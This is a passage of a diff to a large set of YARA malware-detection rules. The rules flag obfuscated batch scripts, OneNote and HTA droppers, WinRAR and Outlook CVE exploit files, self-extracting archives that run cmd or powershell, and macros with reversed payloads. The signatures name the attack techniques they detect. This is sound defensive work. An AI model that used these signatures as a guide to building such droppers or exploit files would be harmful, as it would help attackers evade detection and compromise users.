+		date = "2022-10-25"
+		modified = "2022-12-12"
 		reference = "https://github.com/elceef/yara-rulz"
-		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Suspicious_OneNote.yara#L1-L23"
+		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Base64_SVG_Javascript.yara#L1-L16"
 		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
-		logic_hash = "b65f0976b71c1e827ecce09f0c435d9ffa6a5d3b3a41401efc6a14b6259af4ad"
+		logic_hash = "e4cb08ccc75dc00b518c4ee1495409ae6bb99e7d493be55312b8d39aa9099cfc"
+		score = 75
+		quality = 75
+		tags = ""
+		hash1 = "fe394a59e961c3fbcc326e7d0ee5909596de55249e669bc4da0aed172c11fda8"
+		hash2 = "f0c94f2705b1aea17f4a6c6d71c6ed725fe71bf66b03b0117060010859ca8a19"
+
+	strings:
+		$svg = "\"data:image/svg+xml;base64" wide ascii
+		$js = "<script type=\"text/javascript\">" base64
+
+	condition:
+		all of them
+}
+rule ELCEEF_BAT_Obfuscated_Setenv
+{
+	meta:
+		description = "Detects batch script with obfuscated SET command located directly after @echo off"
+		author = "marcin@ulikowski.pl"
+		id = "999d192e-a792-5953-b9e2-de4b298444d3"
+		date = "2023-05-01"
+		modified = "2023-05-05"
+		reference = "https://twitter.com/wdormann/status/1651631372438585344"
+		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Suspicious_BAT.yara#L1-L20"
+		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
+		logic_hash = "da3a2245207d79cb720079cc2bc88d5f9db22fc16601d21e7c8dcea381ed11e9"
+		score = 75
+		quality = 75
+		tags = ""
+		hash1 = "a0f43c5748ada07a12af81dda2460045030f936a8d5081f3a403f85c2a9668f8"
+		hash2 = "1a0ca873412474a6437d33e48071aa0169f8317b5c996e1b10a41791707b2cf5"
+		hash3 = "83e47d4f3dd43ed01dc573f0b83e9e71f0ec75b6ea5712f640585d01d8aedf3c"
+		hash4 = "cf351a2b1f0a157a92be2e01e460140e2c1d0ee1685474144f2203a97d2de489"
+
+	strings:
+		$s1 = { 40 65 63 68 6f 20 6f 66 66 0d 0a ( 73 65 25 | 73 25 | 25 ) [2-26] 3a 7e [0-6] 3? 25 ( 25 | 20 | 65 25 | 74 20 | 65 74 20 ) }
+		$s2 = { 40 65 63 68 6f 20 6f 66 66 0d 0a 73 65 74 20 22 [4] 3d 73 65 74 20 22 0d 0a 25 }
+
+	condition:
+		$s1 in ( 0 .. 4 ) or $s2 in ( 0 .. 4 )
+}
+rule ELCEEF_BAT_Chunked_Payload_Setenv
+{
+	meta:
+		description = "Detects batch script storing chunks of payload in random environment variables"
+		author = "marcin@ulikowski.pl"
+		id = "18f3ddac-bc19-5b54-891e-93271d59490a"
+		date = "2023-05-05"
+		modified = "2024-04-10"
+		reference = "https://github.com/elceef/yara-rulz"
+		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Suspicious_BAT.yara#L22-L37"
+		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
+		logic_hash = "6b202d1a5723db664c7ca689c73fc1f84365801fd56fc9a035c8d3a0b6b2b9da"
+		score = 75
+		quality = 75
+		tags = ""
+		hash1 = "f73521adbf89be99c4d7ea74ebf7fed815af49ce4dc060656d7c9c631e4d0538"
+
+	strings:
+		$echo = "@echo off"
+		$set = { ( 0d 0a | 26 20 ) 73 65 74 20 22 [10] 3d [2-6] 22 }
+
+	condition:
+		$echo in ( 0 .. 4 ) and #set > 10
+}
+rule ELCEEF_BAT_Begin_Substring_Env
+{
+	meta:
+		description = "Detects suspicious substring syntax at the begining of batch script"
+		author = "marcin@ulikowski.pl"
+		id = "3fca187b-d2e7-595c-9330-25141a54285b"
+		date = "2023-06-02"
+		modified = "2024-04-10"
+		reference = "https://cybersecurity.att.com/blogs/labs-research/seroxen-rat-for-sale"
+		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Suspicious_BAT.yara#L39-L55"
+		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
+		logic_hash = "cc5e6e511bbc0a5cbb277ed0cbac1f2b21db8e21c4cdc802b6a1c3313d3b55cc"
 		score = 65
 		quality = 75
 		tags = ""
-		hash1 = "f408ef3fa89546483ba63f58be3f27a98795655eb4b9b6217cbe302a5ba9d5f7"
-		hash2 = "5306fa7940b4d67dfb031fd315b661cecb2ce81e2f34c9393e1826df0f0bbdc5"
-		hash3 = "e1d34ad42938a777d80f3ee4c206de14021f13ab79600168b85894fdb0867b3e"
-		hash4 = "9e89231578d8b9b190de3288fd10f43cf11a24963a8b0a76f0c46170deda59fd"
-		hash5 = "6778c59a29e25d722230163bea272ece58d2d3696fbce4347c20104e8fb735dc"
+		hash1 = "8ace121fae472cc7ce896c91a3f1743d5ccc8a389bc3152578c4782171c69e87"
 
 	strings:
-		$magic = { ae b1 53 78 d0 29 96 d3 }
-		$fdso_pe32 = { a4 c4 8d 4d 0b 7a 9e ac [20] 4d 5a }
-		$fdso_bat = { a4 c4 8d 4d 0b 7a 9e ac [20] 40 65 63 68 6f 20 6f 66 66 }
-		$fdso_lnk = { a4 c4 8d 4d 0b 7a 9e ac [20] 4c 00 00 00 01 14 02 00 }
-		$fdso_jse = { a4 c4 8d 4d 0b 7a 9e ac [20] 23 40 7e 5e }
-		$fdso_chm = { a4 c4 8d 4d 0b 7a 9e ac [20] 49 54 53 46 03 }
+		$echo = "@echo off"
+		$substr = { 3a 7e ( 3? 2c 3? | 2d 3? 2c 3? | 3? 2c 2d 3? | 3? 3? 2c 3? | 2d 3? 3? 2c 3? | 3? 3? 2c 2d 3? ) 25 }
 
 	condition:
-		$magic at 8 and 1 of ( $fdso_* )
+		$echo in ( 0 .. 4 ) and $substr in ( 10 .. 100 )
+}
+rule ELCEEF_Polymorph_BAT_CAB : FILE
+{
+	meta:
+		description = "Detects polymorphic BAT/CAB files self-extracting payload with extrac32.exe/extract.exe"
+		author = "marcin@ulikowski.pl"
+		id = "10a46120-beaf-5443-bc35-c6d9ef065bb4"
+		date = "2024-04-10"
+		modified = "2024-04-10"
+		reference = "https://github.com/elceef/yara-rulz"
+		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Suspicious_BAT.yara#L57-L72"
+		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
+		logic_hash = "d29d488b0ebcfb485818c181ac674e3586aa1a41ab68185a1f1d3e49295ffbce"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		hash1 = "f1296b12925108a5d675a8b9c2033c0b749b121ae3b5a6a912ce4418daa06d99"
+
+	strings:
+		$extract = { 65 78 74 72 61 63 ( 33 32 | 74 ) 20 2f 79 20 22 25 7e 66 30 22 }
+
+	condition:
+		uint32be( 0 ) == 0x4d534346 and uint32( 16 ) > 80 and $extract in ( 48 .. 80 )
+}
+rule ELCEEF_EICAR_Encrypted_ZIP
+{
+	meta:
+		description = "Detects EICAR file in any encrypted ZIP archive"
+		author = "marcin@ulikowski.pl"
+		id = "c12d42de-356a-584b-9c48-71e65940f1cf"
+		date = "2022-12-13"
+		modified = "2022-12-16"
+		reference = "https://github.com/elceef/yara-rulz"
+		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/EICAR_Encrypted_ZIP.yara#L14-L44"
+		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
+		logic_hash = "56851056671bde38338bd200d9fde59c042f35a2cd84ac9401e716f376c9502c"
+		score = 75
+		quality = 75
+		tags = ""
+
+	strings:
+		$local = {
+			50 4b 03 04 // local file header signature (PK)
+			?? 00 // minimum version
+			?? 00 // flags (bit 0 and 6 indicate encryption)
+			?? 00 // compression method
+			?? ?? // last modification time
+			?? ?? // last modification date
+			?? ?? ?? ?? // CRC-32 of uncompressed and unencrypted data
+			?? ?? ?? ?? // compressed size
+			?? ?? ?? ?? // uncompressed size
+			}
+
+	condition:
+		for any i in ( 1 .. #local ) : ( ( uint8( @local [ i ] + 6 ) & 0x01 or uint8( @local [ i ] + 6 ) & 0x40 ) and uint32( @local [ i ] + 14 ) == 0x6851cf3c and uint32( @local [ i ] + 22 ) == 68 )
+}
+rule ELCEEF_ZIP_High_Ratio_Single_Doc : FILE
+{
+	meta:
+		description = "Detects ZIP archives containing single MS Word document with unusually high compression ratio"
+		author = "marcin@ulikowski.pl"
+		id = "0fbe89d9-1bf5-50a9-b6c1-1d739162a2ba"
+		date = "2023-03-08"
+		modified = "2023-03-08"
+		reference = "https://github.com/elceef/yara-rulz"
+		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/ZIP_High_Ratio_Single_Doc.yara#L8-L27"
+		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
+		logic_hash = "470300b8d6356cff43a1e2be3a23a97be5d1e2ce5a76f2fb2eccdbbb47a4d327"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		hash1 = "4d9a6dfca804989d40eeca9bb2d90ef33f3980eb07ca89bbba06d0ef4b37634b"
+		hash2 = "4bc2d14585c197ad3aa5836b3f7d9d784d7afe79856e0ddf850fc3c676b6ecb1"
+
+	strings:
+		$magic = { 50 4b 03 04 }
+		$ext = ".doc"
+
+	condition:
+		filesize < 1MB and $magic at 0 and #magic == 1 and uint32( 22 ) > 1024 * 1024 * 100 and $ext at ( uint16( 26 ) + 26 )
 }
 rule ELCEEF_HTML_Windows_Search_Abuse
 {
@@ -175726,54 +175819,94 @@ rule ELCEEF_HTML_Windows_Search_Abuse
 	condition:
 		( any of ( $location* ) or $metarefresh ) and any of ( $search* ) and any of ( $crumb* )
 }
-rule ELCEEF_Winrar_CVE_2023_38831_Exploit : CVE_2023_38831 FILE
+rule ELCEEF_Suspicious_SFX : FILE
 {
 	meta:
-		description = "Detects ZIP archives exploiting CVE-2023-38831 in WinRAR"
+		description = "Detects self-extracting archives (SFX) executing cmd.exe or powershell.exe"
 		author = "marcin@ulikowski.pl"
-		id = "7d592eb7-b344-59ed-adf8-fe69ebb1e43f"
-		date = "2023-09-23"
-		modified = "2023-09-28"
-		reference = "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day"
-		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/WinRAR_CVE_2023_38831.yara#L1-L17"
+		id = "78f4ae8b-ba17-5c02-a6f0-66bec873aba8"
+		date = "2023-04-04"
+		modified = "2023-04-04"
+		reference = "https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/"
+		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Suspicious_SFX.yara#L1-L22"
 		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
-		logic_hash = "06f1d807429fb175831cf333b05b44b6ce33b4ae981e16c03e36ec7564a4fdd1"
+		logic_hash = "688ed356e2fa936a0e07a8479591c28fb457053ed94351bad4bf367b02f04b0a"
+		score = 65
+		quality = 73
+		tags = "FILE"
+
+	strings:
+		$rar = { 52 61 72 21 }
+		$zip = { 50 4b 03 04 }
+		$setup_cmd = "\nSetup=cmd"
+		$setup_powershell = "\nSetup=powershell"
+		$silent = "\nSilent=1"
+
+	condition:
+		filesize < 1MB and uint16be( 0 ) == 0x4d5a and any of ( $zip , $rar ) and any of ( $setup_* ) and $silent
+}
+rule ELCEEF_Outlook_CVE_2023_23397_Exploit : FILE
+{
+	meta:
+		description = "Detects Outlook meeting/appointment/task files with ReminderSoundFile property set to UNC path"
+		author = "marcin@ulikowski.pl"
+		id = "f0dfb7a6-b3bf-58c4-a9a2-978f436679d9"
+		date = "2023-03-16"
+		modified = "2023-04-20"
+		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
+		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Outlook_CVE_2023_23397.yara#L1-L29"
+		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
+		logic_hash = "695721ec276415c6a6a0f4ce6378ff2d11c15d28271f587966bc3d9d8c06f63a"
 		score = 75
-		quality = 75
-		tags = "CVE-2023-38831, FILE"
-		hash1 = "00175d538cba0c493e397a0b7f4b28f9a90dd0ee40f69795ae28d23ce0d826c0"
-		hash2 = "ca8ca67df7853b86b6a107c8fd7f73b757de9143ea8844d0e6209249e8377885"
+		quality = 50
+		tags = "FILE"
+		hash1 = "52dbaf64ce1a5cd1db9a9d385f8204e5f665ca53a3d904033bf1a10369490646"
+		hash2 = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
+		hash3 = "078b5023cae7bd784a84ec4ee8df305ee7825025265bf2ddc1f5238c3e432f5f"
+		hash4 = "1867bc9f81e99a55103288ce10c5c05267119ebb13757686e59bfed156f62b51"
 
 	strings:
-		$ = { 50 4b 03 04 [24] 00 00 [3-64] 2e ?? ?? ?? 20 2f [3-64] 2e ?? ?? ?? 20 2e ( 626174 | 636d64 | 707331 ) }
+		$pid_reminder_file = { 1f 85 00 00 0? 00 ?? 00 }
+		$pid_reminder_override = { 1c 85 00 00 0? 00 ?? 00 }
+		$psetid_common = { 08 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
+		$psetid_appointment = { 02 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
+		$psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
+		$unc = /\\\\([a-z1-9][a-z0-9.]{6}|\.\\UNC\\\\)/ wide ascii
 
 	condition:
-		uint16be( 0 ) == 0x504b and all of them
+		filesize < 1MB and ( uint32be( 0 ) == 0xd0cf11e0 or uint32be( 0 ) == 0x789f3e22 ) and ( $psetid_appointment or $psetid_task ) and $psetid_common and ( $pid_reminder_file and $pid_reminder_override ) and $unc
 }
-rule ELCEEF_ZIP_High_Ratio_Single_Doc : FILE
+rule ELCEEF_Suspicious_Onenote
 {
 	meta:
-		description = "Detects ZIP archives containing single MS Word document with unusually high compression ratio"
+		description = "Detects OneNote documents with FileDataStoreObject structure containing: PE32, shortcut files (*.lnk), encoded JS, Windows Help File (*.chm), or batch script"
 		author = "marcin@ulikowski.pl"
-		id = "0fbe89d9-1bf5-50a9-b6c1-1d739162a2ba"
-		date = "2023-03-08"
-		modified = "2023-03-08"
+		id = "57f6fc7f-666f-5887-ac97-513588415757"
+		date = "2023-01-22"
+		modified = "2023-02-21"
 		reference = "https://github.com/elceef/yara-rulz"
-		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/ZIP_High_Ratio_Single_Doc.yara#L8-L27"
+		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Suspicious_OneNote.yara#L1-L23"
 		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
-		logic_hash = "470300b8d6356cff43a1e2be3a23a97be5d1e2ce5a76f2fb2eccdbbb47a4d327"
-		score = 75
+		logic_hash = "b65f0976b71c1e827ecce09f0c435d9ffa6a5d3b3a41401efc6a14b6259af4ad"
+		score = 65
 		quality = 75
-		tags = "FILE"
-		hash1 = "4d9a6dfca804989d40eeca9bb2d90ef33f3980eb07ca89bbba06d0ef4b37634b"
-		hash2 = "4bc2d14585c197ad3aa5836b3f7d9d784d7afe79856e0ddf850fc3c676b6ecb1"
+		tags = ""
+		hash1 = "f408ef3fa89546483ba63f58be3f27a98795655eb4b9b6217cbe302a5ba9d5f7"
+		hash2 = "5306fa7940b4d67dfb031fd315b661cecb2ce81e2f34c9393e1826df0f0bbdc5"
+		hash3 = "e1d34ad42938a777d80f3ee4c206de14021f13ab79600168b85894fdb0867b3e"
+		hash4 = "9e89231578d8b9b190de3288fd10f43cf11a24963a8b0a76f0c46170deda59fd"
+		hash5 = "6778c59a29e25d722230163bea272ece58d2d3696fbce4347c20104e8fb735dc"
 
 	strings:
-		$magic = { 50 4b 03 04 }
-		$ext = ".doc"
+		$magic = { ae b1 53 78 d0 29 96 d3 }
+		$fdso_pe32 = { a4 c4 8d 4d 0b 7a 9e ac [20] 4d 5a }
+		$fdso_bat = { a4 c4 8d 4d 0b 7a 9e ac [20] 40 65 63 68 6f 20 6f 66 66 }
+		$fdso_lnk = { a4 c4 8d 4d 0b 7a 9e ac [20] 4c 00 00 00 01 14 02 00 }
+		$fdso_jse = { a4 c4 8d 4d 0b 7a 9e ac [20] 23 40 7e 5e }
+		$fdso_chm = { a4 c4 8d 4d 0b 7a 9e ac [20] 49 54 53 46 03 }
 
 	condition:
-		filesize < 1MB and $magic at 0 and #magic == 1 and uint32( 22 ) > 1024 * 1024 * 100 and $ext at ( uint16( 26 ) + 26 )
+		$magic at 8 and 1 of ( $fdso_* )
 }
 rule ELCEEF_Obfuscated_IP_Address_In_URL
 {
@@ -175788,7 +175921,7 @@ rule ELCEEF_Obfuscated_IP_Address_In_URL
 		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
 		logic_hash = "ab2a2a3a56e6eed9f4a3a8f994c89a167f00b86ce442820c81d8ee673b0ab85c"
 		score = 75
-		quality = 40
+		quality = 65
 		tags = ""
 
 	strings:
@@ -175897,245 +176030,59 @@ rule ELCEEF_HTML_Smuggling_C : T1027 FILE
 	condition:
 		filesize < 5MB and $mssave and #blob == 1 and #array == 1 and #loop == 1
 }
-rule ELCEEF_Winrar_CVE_2025_8088_Exploit : CVE_2025_8088 FILE
-{
-	meta:
-		description = "Detects RAR archives exploiting CVE-2025-8088 in WinRAR"
-		author = "marcin@ulikowski.pl"
-		id = "546e2858-c04a-5f3c-94b9-54d5b7f364b5"
-		date = "2025-08-18"
-		modified = "2025-08-18"
-		reference = "https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/"
-		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/WinRAR_CVE_2025_8088.yara#L1-L17"
-		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
-		logic_hash = "f3181b92294ad68467b6ce121170a91b423604fd152f27899a2f34879266e9d8"
-		score = 75
-		quality = 75
-		tags = "CVE-2025-8088, FILE"
-		hash1 = "2a8fafa01f6d3863c87f20905736ebab28d6a5753ab708760c0b6cf3970828c3"
-
-	strings:
-		$ = { 00 03 53 54 4d [2-3] 3a ( 5c | 2e ) ( 5c | 2e ) ( 5c | 2e ) ( 5c | 2e ) }
-
-	condition:
-		uint32be( 0 ) == 0x52617221 and all of them
-}
-rule ELCEEF_Base64_SVG_Javascript
-{
-	meta:
-		description = "Detects base64 encoded SVG objects containing Javascript"
-		author = "marcin@ulikowski.pl"
-		id = "99275772-1f4f-5616-9a9c-f76b613fe143"
-		date = "2022-10-25"
-		modified = "2022-12-12"
-		reference = "https://github.com/elceef/yara-rulz"
-		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Base64_SVG_Javascript.yara#L1-L16"
-		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
-		logic_hash = "e4cb08ccc75dc00b518c4ee1495409ae6bb99e7d493be55312b8d39aa9099cfc"
-		score = 75
-		quality = 75
-		tags = ""
-		hash1 = "fe394a59e961c3fbcc326e7d0ee5909596de55249e669bc4da0aed172c11fda8"
-		hash2 = "f0c94f2705b1aea17f4a6c6d71c6ed725fe71bf66b03b0117060010859ca8a19"
-
-	strings:
-		$svg = "\"data:image/svg+xml;base64" wide ascii
-		$js = "<script type=\"text/javascript\">" base64
-
-	condition:
-		all of them
-}
-rule ELCEEF_BAT_Obfuscated_Setenv
-{
-	meta:
-		description = "Detects batch script with obfuscated SET command located directly after @echo off"
-		author = "marcin@ulikowski.pl"
-		id = "999d192e-a792-5953-b9e2-de4b298444d3"
-		date = "2023-05-01"
-		modified = "2023-05-05"
-		reference = "https://twitter.com/wdormann/status/1651631372438585344"
-		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Suspicious_BAT.yara#L1-L20"
-		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
-		logic_hash = "da3a2245207d79cb720079cc2bc88d5f9db22fc16601d21e7c8dcea381ed11e9"
-		score = 75
-		quality = 75
-		tags = ""
-		hash1 = "a0f43c5748ada07a12af81dda2460045030f936a8d5081f3a403f85c2a9668f8"
-		hash2 = "1a0ca873412474a6437d33e48071aa0169f8317b5c996e1b10a41791707b2cf5"
-		hash3 = "83e47d4f3dd43ed01dc573f0b83e9e71f0ec75b6ea5712f640585d01d8aedf3c"
-		hash4 = "cf351a2b1f0a157a92be2e01e460140e2c1d0ee1685474144f2203a97d2de489"
-
-	strings:
-		$s1 = { 40 65 63 68 6f 20 6f 66 66 0d 0a ( 73 65 25 | 73 25 | 25 ) [2-26] 3a 7e [0-6] 3? 25 ( 25 | 20 | 65 25 | 74 20 | 65 74 20 ) }
-		$s2 = { 40 65 63 68 6f 20 6f 66 66 0d 0a 73 65 74 20 22 [4] 3d 73 65 74 20 22 0d 0a 25 }
-
-	condition:
-		$s1 in ( 0 .. 4 ) or $s2 in ( 0 .. 4 )
-}
-rule ELCEEF_BAT_Chunked_Payload_Setenv
+rule ELCEEF_HTA_Wscriptshell_Onenote : FILE
 {
 	meta:
-		description = "Detects batch script storing chunks of payload in random environment variables"
+		description = "Detects suspicious OneNote documents with embedded HTA + WScript.Shell"
 		author = "marcin@ulikowski.pl"
-		id = "18f3ddac-bc19-5b54-891e-93271d59490a"
-		date = "2023-05-05"
-		modified = "2024-04-10"
+		id = "8cebd862-8dfb-5f5d-befb-5c41cde945ff"
+		date = "2023-02-01"
+		modified = "2023-02-02"
 		reference = "https://github.com/elceef/yara-rulz"
-		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Suspicious_BAT.yara#L22-L37"
-		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
-		logic_hash = "6b202d1a5723db664c7ca689c73fc1f84365801fd56fc9a035c8d3a0b6b2b9da"
-		score = 75
-		quality = 75
-		tags = ""
-		hash1 = "f73521adbf89be99c4d7ea74ebf7fed815af49ce4dc060656d7c9c631e4d0538"
-
-	strings:
-		$echo = "@echo off"
-		$set = { ( 0d 0a | 26 20 ) 73 65 74 20 22 [10] 3d [2-6] 22 }
-
-	condition:
-		$echo in ( 0 .. 4 ) and #set > 10
-}
-rule ELCEEF_BAT_Begin_Substring_Env
-{
-	meta:
-		description = "Detects suspicious substring syntax at the begining of batch script"
-		author = "marcin@ulikowski.pl"
-		id = "3fca187b-d2e7-595c-9330-25141a54285b"
-		date = "2023-06-02"
-		modified = "2024-04-10"
-		reference = "https://cybersecurity.att.com/blogs/labs-research/seroxen-rat-for-sale"
-		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Suspicious_BAT.yara#L39-L55"
+		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/HTA_OneNote.yara#L1-L17"
 		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
-		logic_hash = "cc5e6e511bbc0a5cbb277ed0cbac1f2b21db8e21c4cdc802b6a1c3313d3b55cc"
+		logic_hash = "0287ac5d618c9a8332d167f1a05157aa829c7e8a052c35100fcaeb644d452e5c"
 		score = 65
 		quality = 75
-		tags = ""
-		hash1 = "8ace121fae472cc7ce896c91a3f1743d5ccc8a389bc3152578c4782171c69e87"
-
-	strings:
-		$echo = "@echo off"
-		$substr = { 3a 7e ( 3? 2c 3? | 2d 3? 2c 3? | 3? 2c 2d 3? | 3? 3? 2c 3? | 2d 3? 3? 2c 3? | 3? 3? 2c 2d 3? ) 25 }
-
-	condition:
-		$echo in ( 0 .. 4 ) and $substr in ( 10 .. 100 )
-}
-rule ELCEEF_Polymorph_BAT_CAB : FILE
-{
-	meta:
-		description = "Detects polymorphic BAT/CAB files self-extracting payload with extrac32.exe/extract.exe"
-		author = "marcin@ulikowski.pl"
-		id = "10a46120-beaf-5443-bc35-c6d9ef065bb4"
-		date = "2024-04-10"
-		modified = "2024-04-10"
-		reference = "https://github.com/elceef/yara-rulz"
-		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Suspicious_BAT.yara#L57-L72"
-		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
-		logic_hash = "d29d488b0ebcfb485818c181ac674e3586aa1a41ab68185a1f1d3e49295ffbce"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "f1296b12925108a5d675a8b9c2033c0b749b121ae3b5a6a912ce4418daa06d99"
-
-	strings:
-		$extract = { 65 78 74 72 61 63 ( 33 32 | 74 ) 20 2f 79 20 22 25 7e 66 30 22 }
-
-	condition:
-		uint32be( 0 ) == 0x4d534346 and uint32( 16 ) > 80 and $extract in ( 48 .. 80 )
-}
-rule ELCEEF_OLE2_Autoopen_Reversed_Payload : FILE
-{
-	meta:
-		description = "Detects suspiciously reversed payloads in OLE2 objects with auto-open macros"
-		author = "marcin@ulikowski.pl"
-		id = "9244fdb7-9949-58a0-9e39-e61e04cc1574"
-		date = "2021-12-01"
-		modified = "2023-04-04"
-		reference = "https://github.com/elceef/yara-rulz"
-		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/OLE2_Reversed.yara#L1-L20"
-		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
-		logic_hash = "425750e77d31ddc356f803ee6e2f192f93f64534a9633fef02da5caaa60dbcaf"
-		score = 65
-		quality = 42
 		tags = "FILE"
+		hash1 = "002fe00bc429877ee2a786a1d40b80250fd66e341729c5718fc66f759387c88c"
 
 	strings:
-		$auto_open = /(auto|document|workbook)_?(open|close)/ wide ascii nocase
-		$http = /\/\/:s?ptth/ wide ascii
-		$programdata = /\\ataDmargorP\\\\?:C/ wide ascii nocase
-		$windows = /\\swodniW\\\\?:C/ wide ascii nocase
+		$magic = { ae b1 53 78 d0 29 96 d3 }
+		$hta = { 00 04 00 00 00 2e 00 68 00 74 00 61 }
+		$wsh = "CreateObject(\"WScript.Shell\")"
 
 	condition:
-		filesize < 1MB and uint32be( 0 ) == 0xd0cf11e0 and $auto_open and any of ( $http , $programdata , $windows )
+		filesize < 5MB and $magic at 8 and $wsh and $hta
 }
-rule ELCEEF_EICAR_Encrypted_ZIP
+rule ELCEEF_Winrar_CVE_2025_8088_Exploit : CVE_2025_8088 FILE
 {
 	meta:
-		description = "Detects EICAR file in any encrypted ZIP archive"
+		description = "Detects RAR archives exploiting CVE-2025-8088 in WinRAR"
 		author = "marcin@ulikowski.pl"
-		id = "c12d42de-356a-584b-9c48-71e65940f1cf"
-		date = "2022-12-13"
-		modified = "2022-12-16"
-		reference = "https://github.com/elceef/yara-rulz"
-		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/EICAR_Encrypted_ZIP.yara#L14-L44"
+		id = "546e2858-c04a-5f3c-94b9-54d5b7f364b5"
+		date = "2025-08-18"
+		modified = "2025-08-18"
+		reference = "https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/"
+		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/WinRAR_CVE_2025_8088.yara#L1-L17"
 		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
-		logic_hash = "56851056671bde38338bd200d9fde59c042f35a2cd84ac9401e716f376c9502c"
+		logic_hash = "f3181b92294ad68467b6ce121170a91b423604fd152f27899a2f34879266e9d8"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$local = {
-			50 4b 03 04 // local file header signature (PK)
-			?? 00 // minimum version
-			?? 00 // flags (bit 0 and 6 indicate encryption)
-			?? 00 // compression method
-			?? ?? // last modification time
-			?? ?? // last modification date
-			?? ?? ?? ?? // CRC-32 of uncompressed and unencrypted data
-			?? ?? ?? ?? // compressed size
-			?? ?? ?? ?? // uncompressed size
-			}
-
-	condition:
-		for any i in ( 1 .. #local ) : ( ( uint8( @local [ i ] + 6 ) & 0x01 or uint8( @local [ i ] + 6 ) & 0x40 ) and uint32( @local [ i ] + 14 ) == 0x6851cf3c and uint32( @local [ i ] + 22 ) == 68 )
-}
-rule ELCEEF_Outlook_CVE_2023_23397_Exploit : FILE
-{
-	meta:
-		description = "Detects Outlook meeting/appointment/task files with ReminderSoundFile property set to UNC path"
-		author = "marcin@ulikowski.pl"
-		id = "f0dfb7a6-b3bf-58c4-a9a2-978f436679d9"
-		date = "2023-03-16"
